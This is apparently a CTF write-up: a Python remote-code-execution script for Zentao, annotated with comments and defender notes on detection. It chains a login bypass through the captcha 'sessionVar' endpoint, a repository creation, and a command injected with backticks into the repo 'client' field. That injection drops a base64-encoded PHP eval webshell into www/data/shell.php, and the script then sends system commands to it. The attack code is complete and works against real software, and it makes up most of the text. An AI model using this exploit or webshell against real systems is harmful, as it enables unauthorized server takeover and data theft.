[CTF] 蝉道Zentao RCE脚本

编写的是非伪静态版本
伪静态替换下路径即可

import requests
import random
import re

# Author S1EEPS0RT

# Module-level request headers shared by getSessionId, createRepo and editRepo.
# NOTE: this dict is mutated in place by those functions (they set "Cookie",
# "Referer", "Origin", "Accept", "X-Requested-With"), so values set by one
# call leak into the next; it is not a constant despite being module-level.
header={
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"
}

def getSessionId(url: str, session: requests.Session) -> str | None:
    """Obtain a ``zentaosid`` cookie via the captcha endpoint and check it passes the login gate.

    Args:
        url: Base URL of the Zentao ``www`` directory (no trailing slash).
        session: ``requests.Session`` used for both GET requests.

    Returns:
        The ``zentaosid`` cookie value when ``/index.php?m=my&f=index`` does not
        contain the login-redirect marker, otherwise ``None`` (implicit return).

    Defender note: the request of interest is ``m=misc&f=captcha`` carrying a
    ``sessionVar`` query parameter followed by an unauthenticated visit to
    ``m=my&f=index`` that is not redirected to login; logging that pair is a
    usable detection signal, and the mitigation is the vendor fix for the
    captcha/session handling (this page does not name a version).
    """
    # The captcha endpoint is requested with sessionVar=user; presumably this
    # is what makes the resulting session pass the login check below — confirm.
    target=url+"/index.php?m=misc&f=captcha&sessionVar=user"
    r=session.get(target,headers=header)
    try:
        zentaosid=r.cookies.get_dict()['zentaosid']
        print(zentaosid)
    except:
        # BUG: the bare except only prints; execution continues and the next
        # line references an unbound ``zentaosid`` (NameError) when the cookie
        # is absent. It also masks errors other than the missing key.
        print("[x]","无法获取Cookie")

    # Mutates the module-level header dict; later functions overwrite "Cookie" again.
    header["Cookie"]="zentaosid="+zentaosid
    resp=session.get(url+"/index.php?m=my&f=index",headers=header)
    # Absence of the login URL in the body is taken to mean the session is authenticated.
    if "index.php?m=user&f=login" not in resp.text:
        print("[*]","绕过登陆验证")
        return zentaosid
    else:
        # Falls through and returns None; main() does not check for this.
        print("[x]","无法绕过验证")
def createRepo(url: str, sid: str) -> str:
    """Create a repository record and return its numeric ``repoID``.

    Args:
        url: Base URL of the Zentao ``www`` directory.
        sid: ``zentaosid`` cookie value from getSessionId.

    Returns:
        The ``repoID`` captured from the response text.

    Raises:
        SystemExit: via ``exit()`` when no ``repoID=<digits>`` appears in the response.

    Note: the request is sent with the module-level ``requests.post``, not the
    ``Session`` created in main, so only the explicit ``Cookie`` header carries state.
    """
    target=url+"/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss"
    # Mutates the shared header dict; "X-Requested-With" set here persists for later calls.
    header["Cookie"]="zentaosid="+sid
    header["Referer"]=url+"/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss"
    header["Origin"]=url
    header["Accept"]="application/json, text/javascript, */*; q=0.01"
    header["X-Requested-With"]="XMLHttpRequest"
    # Random suffixes on serviceProject/name avoid a duplicate-name rejection on repeated runs.
    payload = "product%5B%5D=1&SCM=Gitlab&serviceProject=ptest"+str(random.randint(100, 90000))+"&name=pp1"+str(random.randint(100, 90000))+"&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=63e4a18218a68"
    r=requests.post(target,headers=header,data=payload)
    print("[*]",r.text)
    # The response is expected to embed a redirect/link containing repoID=<digits>.
    match = re.search(r'repoID=(\d+)', r.text)
    if match:
        return match.group(1)
    else:
        print("[x]","创建仓库失败")
        # Builtin site ``exit()``; raises SystemExit rather than returning.
        exit()
def editRepo(url: str, sid: str, repoid: str) -> None:
    """Edit the repository so that its ``client`` field carries a shell command.

    Args:
        url: Base URL of the Zentao ``www`` directory.
        sid: ``zentaosid`` cookie value.
        repoid: Numeric repository id returned by createRepo.

    Returns:
        None; the response body is only printed.

    Defender note: the ``client`` form field is meant to hold a path to an SCM
    client binary, but here it contains a URL-encoded, backtick-wrapped command
    that decodes a base64 PHP stub into ``../../www/data/shell.php``. Requests to
    ``m=repo&f=edit`` whose ``client`` value contains backticks (``%60``), pipes
    or redirection, and unexpected new ``.php`` files under ``www/data``, are
    the detection signals; the mitigation is strict validation of ``client``
    (absolute path to an allow-listed executable, no shell metacharacters) and
    never passing it through a shell.
    """
    target=url+"/index.php?m=repo&f=edit&repoID="+repoid+"&objectID=0&tid=91c0hwo4"
    # Referer still points at the create page, not the edit page (copied from createRepo).
    header["Cookie"]="zentaosid="+sid
    header["Referer"]=url+"/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss"
    header["Origin"]=url
    header["Accept"]="application/json, text/javascript, */*; q=0.01"
    # ``product%255B%255D`` is double-encoded (``%25`` = ``%``), unlike createRepo's single encoding;
    # SCM is switched to Subversion and ``path`` is a fixed dummy URL.
    payload = "product%255B%255D=1&SCM=Subversion&serviceProject=0&name=O0O&path=http://10.0.0.1&encoding=utf-8&client=%60echo%20PD9waHAgZXZhbCgkX1BPU1RbImEiXSkgPz4=%7Cbase64%20-d%20%3E%20../../www/data/shell.php%60&account=&password=&encrypt=base64&desc=&uid=66b9b73fa898b"
    r=requests.post(target,headers=header,data=payload)
    print("[*]",r.text)
def execCommand(url: str, command: str) -> None:
    """POST ``command`` as form field ``a`` to ``/data/shell.php`` and print the response.

    Args:
        url: Base URL of the Zentao ``www`` directory.
        command: Already URL-encoded PHP snippet; it is concatenated raw, so the
            caller is responsible for encoding (main passes ``%3B`` for ``;``).

    Returns:
        None; the response body is only printed.

    Defender note: a POST with a single ``a=`` body parameter to a file under
    ``www/data`` is the post-exploitation traffic to alert on; file-integrity
    monitoring of that directory catches the dropped file itself.
    """
    # Local headers here; the shared module-level ``header`` dict is deliberately not used.
    headers={
        "Content-Type":"application/x-www-form-urlencoded"
    }
    target=url+"/data/shell.php"
    payload = "a="+command
    r=requests.post(target,data=payload,headers=headers)
    print("[*]",r.text)
# Entry point: session id -> create repo -> edit repo -> execute via dropped file.
# The target is hard-coded (CTF lab address); there is no argument parsing.
if __name__ == '__main__':
    base_url = "http://172.21.11.5/zentaopms/www"
    # The Session is only used inside getSessionId; createRepo/editRepo call requests.post directly.
    session=requests.Session()
    print("<-- S1EEPS0RT -->")
    sid = getSessionId(base_url,session)
    # NOTE: sid is None when getSessionId fails its login check; createRepo then
    # raises TypeError on "zentaosid="+sid rather than reporting the failure.
    print("[*]","尝试创建Repo")
    repoID = createRepo(base_url,sid)
    print("[*]","RepoID:",repoID)
    print("[*]","尝试写入WebShell")
    editRepo(base_url,sid,repoID)
    print("[*]","通过 /data/shell.php 执行命令")
    # ``%3B`` is the URL-encoded ``;`` terminating the PHP statement.
    execCommand(base_url,"system('id;date;env')%3B")